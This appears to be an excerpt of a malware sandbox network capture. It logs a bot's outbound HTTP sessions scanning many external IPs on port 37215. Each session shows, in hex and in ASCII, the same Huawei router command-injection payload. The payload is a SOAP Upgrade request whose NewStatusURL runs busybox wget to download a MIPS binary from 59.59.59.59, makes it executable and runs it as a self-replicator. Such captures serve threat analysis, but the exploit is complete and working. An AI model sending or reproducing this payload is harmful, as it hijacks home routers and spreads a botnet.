70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          402192.168.2.154473825.199.12.737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.560187101 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          403192.168.2.1554942219.139.83.19237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.560205936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          404192.168.2.1537638157.70.104.15237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.560322046 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          405192.168.2.153694073.77.86.14037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.567677021 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          406192.168.2.1554112157.231.207.3737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.567711115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          407192.168.2.1559008157.94.107.4837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.567871094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          408192.168.2.1538690197.76.79.2537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.568195105 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          409192.168.2.155025041.135.59.16637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.568240881 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          410192.168.2.1556528197.26.82.18037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.568259001 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          411192.168.2.155610641.109.15.16237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.568274975 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          412192.168.2.1537922108.205.144.8437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.568448067 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
